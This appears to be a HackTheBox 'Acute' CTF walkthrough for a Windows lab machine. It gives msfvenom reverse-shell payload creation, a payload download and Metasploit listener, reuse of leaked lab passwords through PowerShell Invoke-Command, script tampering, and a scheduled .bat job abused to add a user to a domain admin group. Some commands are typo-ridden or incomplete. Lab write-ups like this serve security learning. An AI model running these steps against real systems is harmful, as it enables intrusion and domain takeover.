Acute from HackTheBox — Walkthrough

Hello hackers

Windows is used by this computer. Because I have little familiarity with Windows boxes and spend the majority of my practise time on the Linux command line, I found this machine to be challenging (but worthwhile). But this box is ideal if you want to learn something interesting about Windows.

Let’s get started

#Recon: We first start with out nmap scan, we invoke:

 nmap -p- --min-rate 10000 -A -v

find a domain name >> https://atsserver.acute.local add name and # # #/etc/hosts then let’s see what’s in web

Lot of search and find some username’s and also (New Starter Forms) click option then download file

We find got some information in download’s file like admin username & defalt password login page and sys name

#next login

iam stack in here for computer name after reserch find exiftool for matadata of the downloaded file

 exiftool New_Starter_CheckList_v7.docx 

Then find the computer name ‘Acute-PC01’ and successfully logged-in a sys power shell

After some search’s Found a writable directory Utils like Linux tmp directory

Creating payload with msfvenom for reverse shell

      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > shell.exe

Now run python-server

  python3 -m http.server 80

I cant download with wget then I am search wget alternative in windows got some AD reference some other

Invoke-WebRequest -Uri -UseBasicParsing -OutFile “shell.exe”

downloading windows tcp shell.exe file here

then using msfconsle set lhost set lport set payload (msfconsole multi/handler) Reverse connection

set lhost and set lport 4444 and set payload windows/x64/meterpreter/reverse_tcp exploit then also execute shell.exe file in powershell


Now we got reverse connection I can find anything use full I am stuck in here and after some search find some interesting thing screenshare function then am checking that it’s works Now I can see another user username and password and confirm the streaming on browser

We find a user:passwd now we just need to create the same object and use Invoke-Command to execute commands has user imonks

 $passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {whoami} -credential $cred

Now we are created pssession successfully (imonks)

Now we want to enumerate more imonks

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /user} -credential $cred
 nvoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /user/imonks} -credential $cred
   nvoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /user/imonks/Desktop} -credential $cred

 invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /Users/imonks/Desktop/user.txt} -credential $cred

Boom we have user.txt also seems we have a powershell script let cat it to see what we have inside.

(invoke-Command -computername atsserver -ConfigurationName dc_manage – ScriptBlock {cat /Users/imonks/Desktop/wm.ps1} -credential $cred)

Now that scripts look promising seems it a script that contain jmorgan password we can see it in the object it possible to execute command has jmorgan if we run the script. So what we need to do is edit Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds remove Get-Volume and add a path to our reverse shell executable file.

 Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock{((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\shell3.exe') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $cred

Now we can execute it with invoke-command again.

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1} -credential $cred

Now back to check our listener.

Now we know jmorgan is part of administrator group we can dump the hashes.

Now let crack the administrator hash

But the issue is when i try to use on the administrator it a dead end so let try password reuse on each users we know we have no access to yet use powershell script just like the first time setting object and using the invoke-command .

A flashback if i can remember we found some new users ATSSERVER why not let give it a try with the usernames.

$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd)

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {whoami} -credential $cred

It’s work for user awallace more enumeration now.

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /} -credential $cred

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /"program files"} -credential $cred
 invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /"program files"/keepmeon} -credential $cred

Now we have a bat file let cat to see what the keepmeon.bat doing.

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /"program files"/keepmeon/keepmeon.bat} -credential $cred

Now that seems like a job keep running every 5min just like a cronjob in linux probably these one is scheduled to run every 5 min which is cool i guess.

Let me break it down any file ending with .bat would run every 5 min since we are in the keepmeon folder so it possible to create a payload in a bat format which can give access to lois now back to the doc file we got first.

Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.

Now let add user awallace to the group of site_admin and wait for 5min to confirm it.

 Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}

Now confirm if user awallace is now part of site_admin group.

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {net group site_admin} -credential $cred

Now we are part of site_admin group time to get the root.txt flag.

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users/administrator/desktop} -credential $cred
invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /users/administrator/desktop/root.txt} -credential $cred

then finally we got root flag